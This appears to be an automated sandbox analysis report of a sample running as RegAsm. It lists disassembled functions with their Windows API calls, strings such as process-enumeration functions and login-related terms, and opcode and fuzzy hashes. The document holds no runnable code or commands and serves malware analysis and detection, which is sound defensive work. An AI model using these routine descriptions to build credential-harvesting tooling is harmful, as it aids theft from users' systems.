                                                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                • String ID: ($d
                                                                                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                                                                                • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3015003838-0
                                                                                                                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 59245283-0
                                                                                                                                                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                • String ID: 3A
                                                                                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                • String ID: strings
                                                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoadMessage
                                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                • API String ID: 3897320386-317687271
                                                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                Function 004138C1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                • API String ID: 4271163124-70141382
                                                                                                                                                                                • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                Function 0041383D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                • API String ID: 4139908857-3953557276
                                                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                                                • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                                                • Opcode ID: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
